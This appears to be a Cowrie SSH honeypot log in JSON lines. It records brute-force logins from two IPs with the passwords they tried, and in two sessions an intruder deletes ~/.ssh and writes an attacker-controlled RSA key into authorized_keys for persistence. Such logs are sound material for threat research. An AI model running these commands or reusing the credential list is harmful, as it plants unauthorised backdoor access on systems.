{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-09T10:18:33.998360Z","src_ip":"212.227.235.229","session":"1584c01d30a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35756,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a0497ddebb8","protocol":"ssh","message":"New connection: 212.227.235.229:35756 (1.2.3.4:22) [session: 2a0497ddebb8]","sensor":"my-vps","timestamp":"2025-09-09T10:18:36.090355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:18:36.091022Z","src_ip":"212.227.235.229","session":"2a0497ddebb8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:18:36.183741Z","src_ip":"212.227.235.229","session":"2a0497ddebb8"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"password1","message":"login attempt [muhamad/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T10:18:36.567898Z","src_ip":"212.227.235.229","session":"2a0497ddebb8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:18:37.664311Z","src_ip":"212.227.235.229","session":"2a0497ddebb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45322,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ee9900a60fb","protocol":"ssh","message":"New connection: 212.227.235.229:45322 (1.2.3.4:22) [session: 0ee9900a60fb]","sensor":"my-vps","timestamp":"2025-09-09T10:18:40.364174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:18:40.382311Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:18:40.644104Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:18:42.433428Z","src_ip":"212.227.235.229","session":"1584c01d30a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Py123456","message":"login attempt [root/Py123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:18:43.261028Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:18:43.840744Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:18:43.842970Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:18:43.845268Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:18:44.105834Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:18:44.675299Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:18:44.677551Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:18:44.940897Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:18:44.941854Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47526,"dst_ip":"1.2.3.4","dst_port":22,"session":"87f8fc91146b","protocol":"ssh","message":"New connection: 212.227.235.229:47526 (1.2.3.4:22) [session: 87f8fc91146b]","sensor":"my-vps","timestamp":"2025-09-09T10:18:45.203363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:18:45.204491Z","src_ip":"212.227.235.229","session":"87f8fc91146b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:18:45.466143Z","src_ip":"212.227.235.229","session":"87f8fc91146b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:18:46.836956Z","src_ip":"212.227.235.229","session":"87f8fc91146b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:18:48.100734Z","src_ip":"212.227.235.229","session":"87f8fc91146b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48556,"dst_ip":"1.2.3.4","dst_port":22,"session":"21ea11119cd7","protocol":"ssh","message":"New connection: 212.227.235.229:48556 (1.2.3.4:22) [session: 21ea11119cd7]","sensor":"my-vps","timestamp":"2025-09-09T10:18:48.361023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:18:48.363901Z","src_ip":"212.227.235.229","session":"21ea11119cd7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:18:48.625313Z","src_ip":"212.227.235.229","session":"21ea11119cd7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:18:49.668017Z","src_ip":"212.227.235.229","session":"21ea11119cd7"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:18:49.929975Z","src_ip":"212.227.235.229","session":"0ee9900a60fb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:18:49.931208Z","src_ip":"212.227.235.229","session":"21ea11119cd7"}
{"eventid":"cowrie.session.connect","src_ip":"8.216.131.23","src_port":54147,"dst_ip":"1.2.3.4","dst_port":22,"session":"884939e0b327","protocol":"ssh","message":"New connection: 8.216.131.23:54147 (1.2.3.4:22) [session: 884939e0b327]","sensor":"my-vps","timestamp":"2025-09-09T10:18:55.221815Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:18:55.227365Z","src_ip":"8.216.131.23","session":"884939e0b327"}
{"eventid":"cowrie.session.connect","src_ip":"8.216.131.23","src_port":54151,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d37fe60bf23","protocol":"ssh","message":"New connection: 8.216.131.23:54151 (1.2.3.4:22) [session: 4d37fe60bf23]","sensor":"my-vps","timestamp":"2025-09-09T10:18:55.383292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-JSCH-0.1.51","message":"Remote SSH version: SSH-2.0-JSCH-0.1.51","sensor":"my-vps","timestamp":"2025-09-09T10:18:55.384400Z","src_ip":"8.216.131.23","session":"4d37fe60bf23"}
{"eventid":"cowrie.client.kex","hassh":"5295b61b4a9804d82faf080a85c86021","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1;aes128-ctr,aes128-cbc,3des-ctr,3des-cbc,blowfish-cbc;hmac-md5,hmac-sha1,hmac-sha2-256,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes128-cbc","3des-ctr","3des-cbc","blowfish-cbc"],"macCS":["hmac-md5","hmac-sha1","hmac-sha2-256","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 5295b61b4a9804d82faf080a85c86021","sensor":"my-vps","timestamp":"2025-09-09T10:18:55.613986Z","src_ip":"8.216.131.23","session":"4d37fe60bf23"}
{"eventid":"cowrie.login.success","username":"root","password":"XXXXX","message":"login attempt [root/XXXXX] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:18:56.250297Z","src_ip":"8.216.131.23","session":"4d37fe60bf23"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:18:56.416581Z","src_ip":"8.216.131.23","session":"4d37fe60bf23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35766,"dst_ip":"1.2.3.4","dst_port":22,"session":"012dc427c34f","protocol":"ssh","message":"New connection: 212.227.235.229:35766 (1.2.3.4:22) [session: 012dc427c34f]","sensor":"my-vps","timestamp":"2025-09-09T10:19:35.878611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:19:35.885147Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:19:35.980792Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.login.success","username":"root","password":"adminn","message":"login attempt [root/adminn] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:19:36.416886Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:19:36.634242Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:19:36.636530Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:19:36.639067Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:19:36.740232Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:19:37.044116Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:19:37.046800Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:19:37.145873Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:19:37.147344Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35774,"dst_ip":"1.2.3.4","dst_port":22,"session":"576b33ccfcd2","protocol":"ssh","message":"New connection: 212.227.235.229:35774 (1.2.3.4:22) [session: 576b33ccfcd2]","sensor":"my-vps","timestamp":"2025-09-09T10:19:37.247484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:19:37.248606Z","src_ip":"212.227.235.229","session":"576b33ccfcd2"}
